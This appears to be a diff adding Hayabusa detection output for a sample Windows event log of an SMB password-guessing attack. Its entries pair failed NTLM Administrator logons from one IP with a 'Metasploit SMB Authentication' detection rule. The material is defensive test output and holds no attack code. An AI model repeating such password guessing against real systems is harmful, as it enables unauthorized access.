+2016-09-20 01:50:24.842 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: qH0AY3DeIryuHSiN  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:24.842 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:24.886 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: DjqtxY5Fly4qAusS  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:24.886 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:24.935 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: PXHYu7wAqo7m6mZn  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:24.935 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:24.990 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: UaEM3boErBRrCbna  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:24.990 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:25.040 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 7nSzwstH2imPjwah  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:25.040 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:25.153 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 9Z6NM0I4vRTXlLKu  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:25.153 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:25.193 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: jYhjN3f8KlFIEUKy  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:25.193 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:25.232 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: qWicYt2HXLDgc3kc  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:25.232 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:25.269 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: Uz7yqqxdMrsM2L1g  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:25.269 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:25.308 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: wqKTguT2Z3OPCxGR  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:25.308 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:25.352 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: ywpwCM4u6nFSq9oS  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:25.352 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:25.407 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: k1t5ZBw3HOxux65e  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:25.407 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:25.534 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: MtLFQSltjjOjdl2c  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:25.534 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:25.593 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: AyFD3cjef0NUMZZ5  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:25.593 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:25.656 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: uDYECnF1YTKRKA3K  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:25.656 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:25.700 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: pfqxcIVpX9BbsPIM  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:25.700 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:25.745 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: mjL5hvyYesMfDISw  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:25.745 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:25.774 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 3bh8c5ohv55SAX26  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:25.774 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:25.817 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: MflfcFDnGU3xUOmz  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:25.817 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:25.859 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: aX0wfTs5FzCdwGrR  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:25.859 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:25.895 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 9gdU6faDjEH5wW2X  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:25.895 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:25.929 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 507PC8xD6l0TbhG3  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:25.929 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:25.973 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: VrWgYcf9EuXt4MHS  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:25.973 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:26.088 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: GvIGEw3fdX9cDzIV  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:26.088 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:26.159 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 9X1q0dT5irWa44Rz  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:26.159 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:26.307 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: ZpgAkElSQjVo53z2  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:26.307 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:26.410 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 7nxUEwRMaiAhiIXv  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:26.410 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:26.453 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: vIoaysmFNfEerv8f  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:26.453 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:26.528 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: aHLhFgL0xfnrAIoF  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:26.528 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:26.619 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: YGK96B1hDPMK9YKh  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:26.619 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:26.704 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: yhDnNRDnAwctVtgQ  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:26.704 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:26.793 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 8zzO7RKaBPpg549A  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:26.793 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:26.859 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: zDgDGO3IKiLoIQ5D  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:26.859 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:27.024 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 0aaYeBTUEudC3446  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:27.024 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:27.093 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: I41H8U06uuGlMf9S  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:27.093 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:27.170 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: r6Eh55149gbuU2el  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:27.170 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:27.248 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: ajzJabQi7CjosFQ1  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:27.248 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:27.290 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: l9y7gyU9aJi6Fpm3  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:27.290 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:27.361 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: hbLiIVcBYlu5JkX2  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:27.361 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:27.424 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: bDfEfHk54J3lJI6m  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:27.424 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:27.496 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: WOpuMTECalyeObl7  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:27.496 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:27.537 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: nZQYU1dyQOqlNJDL  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:27.537 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:27.577 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: pc58gDT07WNH3mMz  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:27.577 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:27.624 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: EhExnDfInKbEI6AO  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:27.624 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:27.710 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: qKKTTQ0ZT2Ye4TV9  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:27.710 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:27.772 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: LdBFYyftnH67Gyh5  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
